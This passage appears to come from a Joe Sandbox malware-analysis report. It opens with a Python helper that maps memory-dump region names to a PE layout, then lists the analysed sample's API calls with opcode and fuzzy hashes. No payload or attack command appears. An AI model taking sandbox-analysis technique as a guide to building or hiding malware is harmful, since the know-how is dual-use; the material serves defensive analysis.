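    Size is the distance to the next region; the last region's size is None."""
    regions = sorted((parse_sdmp_name(n) for n in names), key=lambda r: r.base)
    regions = [r for r in regions if r.base >= module_base]
    out = []
    for i, r in enumerate(regions):
        nxt = regions[i + 1].base if i + 1 < len(regions) else None
        out.append((r.base, r.protection_name, None if nxt is None else nxt - r.base))
    return out


def region_for(names, va):
    """Region with the highest base address not above va, or None."""
    hit = None
    for r in sorted((parse_sdmp_name(n) for n in names), key=lambda r: r.base):
        if r.base <= va:
            hit = r
    return hit


# Constructed from the "Memory Dump Source" names on this page.
DUMP_NAMES = [
    "00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp",
    "00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File",
    "00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File",
    "00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File",
    "00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File",
    "00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File",
]

# "ref:" addresses of API calls listed on this page; all should land in the code region.
API_REFS = {"SystemParametersInfoW": 0x008532FE, "timeGetTime": 0x0086F97A,
            "Sleep": 0x008AFAC2, "GetPrivateProfileStringW": 0x008C8EBE}


def check_api_refs(names=DUMP_NAMES, refs=API_REFS):
    """Return {api: (base of containing region, region is executable)}."""
    out = {}
    for api, va in refs.items():
        r = region_for(names, va)
        out[api] = (r.base, r.executable)
    return out


if __name__ == "__main__":
    for base, prot, size in module_layout(DUMP_NAMES, 0x00850000):
        print(f"{base:08X}  {prot:<24} {'?' if size is None else f'0x{size:X}'}")
    print(check_api_refs())
```

The implied sizes reproduce a normal PE layout for the module: a 0x1000 read-only page of headers at 0x850000, a 0x9C000 PAGE_EXECUTE_READ code region at 0x851000, read-only data, a PAGE_READWRITE data region at 0x91D000, and a trailing read-only region whose size cannot be inferred from the names alone. Every API reference address on the page resolves into the 0x851000 executable region, which is the sanity check to run before trusting a "ref:" address when you open the downloaded dump in IDA.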
                                                                                                                                                                            APIs
                                                                                                                                                                            • timeGetTime.WINMM ref: 0086F97A
                                                                                                                                                                              • Part of subcall function 0085EE07: GetInputState.USER32 ref: 0085EEB7
                                                                                                                                                                            • Sleep.KERNEL32(00000000), ref: 008AFAC2
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                             • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InputSleepStateTimetime
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4149333218-0
                                                                                                                                                                            • Opcode ID: ceabbba4604b15e9fb4761995d960e8b0541b332c4d7dfe60aaa13c1fe697b6a
                                                                                                                                                                            • Instruction ID: 292c02c1aa08c5641993bfe329a2c008f72e7e91b12a130fd874acd5a5c1cf10
                                                                                                                                                                            • Opcode Fuzzy Hash: ceabbba4604b15e9fb4761995d960e8b0541b332c4d7dfe60aaa13c1fe697b6a
                                                                                                                                                                            • Instruction Fuzzy Hash: 55F08C71240705AFD314EFA9D849B5AFBE9FF49361F00402AE95ACB261DB70A804CB92
                                                                                                                                                                            APIs
                                                                                                                                                                              • Part of subcall function 0088506A: DeleteCriticalSection.KERNEL32(?,?,?,?,?,00919C08,00000010,008794DE), ref: 008850CC
                                                                                                                                                                              • Part of subcall function 0088506A: _free.LIBCMT ref: 008850DA
                                                                                                                                                                              • Part of subcall function 0088510A: _free.LIBCMT ref: 0088512C
                                                                                                                                                                            • DeleteCriticalSection.KERNEL32(-00000020), ref: 008794FA
                                                                                                                                                                            • _free.LIBCMT ref: 0087950E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                             • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: _free$CriticalDeleteSection
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1906768660-0
                                                                                                                                                                            • Opcode ID: cd4f90ef8d2a40109e0585aab18d3b8ed71cc3587158526efcf74d7002439396
                                                                                                                                                                            • Instruction ID: 087493f472869ee759ff2cc4665264fe0cc32b519be9abed72605b72624f2771
                                                                                                                                                                            • Opcode Fuzzy Hash: cd4f90ef8d2a40109e0585aab18d3b8ed71cc3587158526efcf74d7002439396
                                                                                                                                                                            • Instruction Fuzzy Hash: 3BE04F378289108BD731B76CFC56A5937F4FB5A350B054416F405D3129DF25AC63974A
                                                                                                                                                                            APIs
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,00000000,00000002,00000001,?,?,?,0085AE65,?,?,?), ref: 00858793
                                                                                                                                                                            • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,?,00000000,?,?,?,0085AE65,?,?,?), ref: 008587C9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ByteCharMultiWide
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 626452242-0
                                                                                                                                                                            • Opcode ID: 216f97b7f84d675e456777f9a44ff37c562400fc3e80ac84bf07a8eaa97814b1
                                                                                                                                                                            • Instruction ID: f76497057fd5290714b4b7c09814e9fe200708889d0bfd6d2a7c63efbb457a12
                                                                                                                                                                            • Opcode Fuzzy Hash: 216f97b7f84d675e456777f9a44ff37c562400fc3e80ac84bf07a8eaa97814b1
                                                                                                                                                                            • Instruction Fuzzy Hash: B101F771300204BFEB18AB799C4BF7F7AADEB88340F10403EB506DA1D0EDA09C009535
                                                                                                                                                                            APIs
                                                                                                                                                                            • __Init_thread_footer.LIBCMT ref: 0085CE8E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Init_thread_footer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1385522511-0
                                                                                                                                                                            • Opcode ID: b220f69dc0b732d8a0a81f86173c34a881097effe9f270dbf39bea3523f8aa77
                                                                                                                                                                            • Instruction ID: 1f888c5efa6e930fee70e0ec3b1096dd3eedcba30698a01ddfac2b9e7e879688
                                                                                                                                                                            • Opcode Fuzzy Hash: b220f69dc0b732d8a0a81f86173c34a881097effe9f270dbf39bea3523f8aa77
                                                                                                                                                                            • Instruction Fuzzy Hash: 2632BB74A002099FDF20CF58C889ABABBB5FB45315F188059EC06EB251C774AE45CF91
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                             • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 2e83a3aa763647a37e7de801945c1d76671ce06f4b2d9beb3c70affb76958712
                                                                                                                                                                            • Instruction ID: d39fd37414b24e34a6abf50ba6cd46b8f6a015d4d4a18c8e4f15b6063013de2a
                                                                                                                                                                            • Opcode Fuzzy Hash: 2e83a3aa763647a37e7de801945c1d76671ce06f4b2d9beb3c70affb76958712
                                                                                                                                                                            • Instruction Fuzzy Hash: A751C135A14208AFDB10DF69C840AA97BA1FF85364F19C168EA1CDB397D731ED42CB91
                                                                                                                                                                            APIs
                                                                                                                                                                            • TerminateProcess.KERNELBASE ref: 008700AF
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                             • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
                                                                                                                                                                             • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ProcessTerminate
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 560597551-0
                                                                                                                                                                            • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                            • Instruction ID: 600ed9394ccf9c66348d602dc542a242b3ccf924808848ace1b2e9f6e739d914
                                                                                                                                                                            • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                                            • Instruction Fuzzy Hash: 3C31E070A00509DBC718CF58C484A69F7A2FB59324B28C6A9E40ECB35AD732EDC1CF90
APIs
  • Part of subcall function 0085557E: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00855558,?,?,00894B50,?,?,00000100,00000000,00000000,CMDLINE), ref: 0085559E
• GetPrivateProfileStringW.KERNEL32(?,?,?,?,0000FFFF,?), ref: 008C8EBE
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: FullNamePathPrivateProfileString
• String ID:
• API String ID: 1991638491-0
APIs
  • Part of subcall function 00856332: LoadLibraryA.KERNEL32(kernel32.dll,?,?,0085637F,?,?,008560AA,?,00000001,?,?,00000000), ref: 0085633E
  • Part of subcall function 00856332: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00856350
  • Part of subcall function 00856332: FreeLibrary.KERNEL32(00000000,?,?,0085637F,?,?,008560AA,?,00000001,?,?,00000000), ref: 00856362
• LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,008560AA,?,00000001,?,?,00000000), ref: 0085639F
  • Part of subcall function 008562FB: LoadLibraryA.KERNEL32(kernel32.dll,?,?,008954C3,?,?,008560AA,?,00000001,?,?,00000000), ref: 00856304
  • Part of subcall function 008562FB: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00856316
  • Part of subcall function 008562FB: FreeLibrary.KERNEL32(00000000,?,?,008954C3,?,?,008560AA,?,00000001,?,?,00000000), ref: 00856329
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: Library$Load$AddressFreeProc
• String ID:
• API String ID: 2632591731-0
APIs
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: __wsopen_s
• String ID:
• API String ID: 3347428461-0
APIs
• ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00856B73,?,00010000,00000000,00000000,00000000,00000000), ref: 0085B0AC
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: FileRead
• String ID:
• API String ID: 2738559852-0
APIs
  • Part of subcall function 0088500D: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,008831B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 0088504E
• _free.LIBCMT ref: 008853FC
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: AllocateHeap_free
• String ID:
• API String ID: 614378929-0
APIs
• GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,008533E9,00922418,?,?,?,?,?,?,?,008532EF,?), ref: 00854227
  • Part of subcall function 008584B7: _wcslen.LIBCMT ref: 008584CA
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: FullNamePath_wcslen
• String ID:
• API String ID: 4019309064-0
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID:
• String ID:
• API String ID:

APIs
• RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,008831B9,00000001,00000364,?,?,?,0000000A,00000000), ref: 0088504E
Memory Dump Source
• Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
• Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
Similarity
• API ID: AllocateHeap
• API String ID: 1279760036-0
• Opcode ID: a86ee6d11a1e453e8b8d78fd3628c8c5839e8bcaa2829e94f3955a0155f1fcab
• Instruction ID: d46f82acf2c6e02c64aac19a8abc1a4119d300cc9fa690ab249d7651aa7976ea
• Instruction Fuzzy Hash: 30F0E231A09E286BDB317B26DC01B5A3748FF417A2B188025BC09EA191CA74D80087E1

APIs
• RtlAllocateHeap.NTDLL(00000000,?,?,?,00876A99,?,0000015D,?,?,?,?,008785D0,000000FF,00000000,?,?), ref: 00883BE2
Similarity
• API ID: AllocateHeap
• API String ID: 1279760036-0
• Opcode ID: a9eae834f77b09d8a0683a18f75b5bb2679c946423b2f4dd0606b16c76959971
• Instruction ID: 70545f323eeccf7306394ed24f7bd9e3bde72a88f12000ab7bb54223bd44ee23
• Instruction Fuzzy Hash: 2FE06DB120562867E7213A6A9C01F5A7658FF42FB0F154121AC4AD61A2DB61DE0183F2

Similarity
• Opcode ID: e355ab6b62ef50c54831c9f2292655bc97f9373442f0d943b3fd9d387b0ddeda
• Instruction ID: 98122f2e237c275003bd99b47ea4e06b701349e7f5956f12540122481711b688
• Instruction Fuzzy Hash: 2AF05270100712CFCB349F24D490812BBE0FA1432A324892EE59B87620D732A848CB00

APIs
• _free.LIBCMT ref: 0088512C
  • Part of subcall function 00882D58: RtlFreeHeap.NTDLL(00000000,00000000,?,0088DB71,00921DC4,00000000,00921DC4,00000000,?,0088DB98,00921DC4,00000007,00921DC4,?,0088DF95,00921DC4), ref: 00882D6E
  • Part of subcall function 00882D58: GetLastError.KERNEL32(00921DC4,?,0088DB71,00921DC4,00000000,00921DC4,00000000,?,0088DB98,00921DC4,00000007,00921DC4,?,0088DF95,00921DC4,00921DC4), ref: 00882D80
Similarity
• API ID: ErrorFreeHeapLast_free
• API String ID: 1353095263-0
• Opcode ID: a7136b118dd25681eba1fac516c3f168631d39be7bcab1b26d5392532d0b3266
• Instruction ID: 1143b02e01ecc49d09fa80d97686658833370961386e13aa6ba9d65c2c710ccc
• Instruction Fuzzy Hash: ACE0927A1417099FC720DF6CD804A82B7E5EF853203208529E89DD7220D371E812CB40

Similarity
• API ID: __fread_nolock
• API String ID: 2638373210-0
• Opcode ID: 246872d857331b2299f9d721c1e21c3e63b90e22c0d4325a9684d784a7ce1dac
• Instruction ID: 1ce51d29e97229f3ec877f6d021873f809f912c56d496691728d58ff72712f9a
• Instruction Fuzzy Hash: 8DF0F87540020DFFDF05DF94C941E9E7B79FB18318F208485F9199A152D336DA21EBA1

Similarity
• API ID: _wcslen
• API String ID: 176396367-0
• Opcode ID: cc851593f1fd2b35ed972b3ca0519c9d6ab1506275115f6254acfd33543c89c1
• Instruction ID: 62755f4959761dd3b80a985ba91ad70ea664dc27bc45e1db3ac6ca998397df80
• Instruction Fuzzy Hash: 7ED0A72334205036B669313D2D0BC7F491CDBC26A0B05903FFA0BCA1ADED448C0300F2

APIs
• GetShortPathNameW.KERNELBASE(?,?,00007FFF), ref: 008BE7A2
  • Part of subcall function 008584B7: _wcslen.LIBCMT ref: 008584CA
Similarity
• API ID: NamePathShort_wcslen
• API String ID: 2021730007-0
• Opcode ID: 4bb686bcb1371b322e3907e783ecb766d913895e8034f33e10a4164186f511ae
• Instruction ID: 7a66622630476ccccff0799c8d9b52c04af4699e23b14c44b9cc44b9a7a94343
• Instruction Fuzzy Hash: C4E0CD725002245BCB10A39C9C05FDA77DDFFC8791F040071FD05D7248DD64ED848591
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetFilePointerEx.KERNELBASE(?,00000000,00000000,?,00000001,?,?,?,?,0085B0DE,?,?,00000000,?,00856B73,?), ref: 0086F156
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FilePointer
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 973152223-0
                                                                                                                                                                            • Opcode ID: 1d77844b2189c2cca9742a27304bbe59dea713b2ed9d6c10423a820683625d04
                                                                                                                                                                            • Instruction ID: b37e3ba13e8cdb0402156c82d639d8d2624fe682876e0134dfae129434578e58
                                                                                                                                                                            • Opcode Fuzzy Hash: 1d77844b2189c2cca9742a27304bbe59dea713b2ed9d6c10423a820683625d04
                                                                                                                                                                            • Instruction Fuzzy Hash: 37E092B5510704AFD728DF55D846D97BBF8EB08310B00455EA85697740E7B1BD448B50
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008539FD
                                                                                                                                                                              • Part of subcall function 008584B7: _wcslen.LIBCMT ref: 008584CA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LongNamePath_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 541455249-0
                                                                                                                                                                            • Opcode ID: ee365952edecdf31dec38d07a1095deb11286f3ef1aa0b8a9fbb671fcbc7b247
                                                                                                                                                                            • Instruction ID: 15479ea79a5a91cac985ed4c715a08e56da093c8824c9317fc12272cd73b7f3f
                                                                                                                                                                            • Opcode Fuzzy Hash: ee365952edecdf31dec38d07a1095deb11286f3ef1aa0b8a9fbb671fcbc7b247
                                                                                                                                                                            • Instruction Fuzzy Hash: 94E0CD725002245BCB10A39C9C05FDA77DDEFC8791F040071FD05D7248DD64ED848591
                                                                                                                                                                            APIs
                                                                                                                                                                            • SHGetFolderPathW.SHELL32(00000000,?,00000000,00000000,?), ref: 008BE76C
                                                                                                                                                                              • Part of subcall function 008584B7: _wcslen.LIBCMT ref: 008584CA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FolderPath_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2987691875-0
                                                                                                                                                                            • Opcode ID: 292438bef0c6e37b5b60b64388ae4cd138dd0fad3a78fd5590caba39cae348ed
                                                                                                                                                                            • Instruction ID: 516e0e514030415b419f17fe95b7af13d98bab0ce208a021482a16a0ebe4e3ec
                                                                                                                                                                            • Opcode Fuzzy Hash: 292438bef0c6e37b5b60b64388ae4cd138dd0fad3a78fd5590caba39cae348ed
                                                                                                                                                                            • Instruction Fuzzy Hash: 70D05EA19003287FEF60A6749C0DDB73AACD740214F0006A17C6DD3182E934ED4986A0
                                                                                                                                                                            APIs
                                                                                                                                                                            • CopyFileExW.KERNELBASE(?,?,00000000,00000000,00000000,00000008,?,?,008BD9DC,?,?), ref: 008BDA72
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000007.00000002.1626438656.0000000000851000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00850000, based on PE: true
                                                                                                                                                                            • Associated: 00000007.00000002.1626423260.0000000000850000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.00000000008ED000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626485978.0000000000913000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626544500.000000000091D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            • Associated: 00000007.00000002.1626564406.0000000000925000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_7_2_850000_dmqiuorkt.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CopyFile
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1304948518-0
                                                                                                                                                                            • Opcode ID: 584afab37252cad8ea90f8955cf214b6814e9659e99ee289b74af0c313ee00e4
                                                                                                                                                                            • Instruction ID: 9abc46180cf87c9182765c31c00886f5575b01c84484cb183d3b9c042740b253
                                                                                                                                                                            • Opcode Fuzzy Hash: 584afab37252cad8ea90f8955cf214b6814e9659e99ee289b74af0c313ee00e4
                                                                                                                                                                            • Instruction Fuzzy Hash: 6ED0A7305D0208BBEF108B50CC03F99B76CE701B45F104194B201EE0D0C7B5A5089724
                                                                                                                                                                            APIs
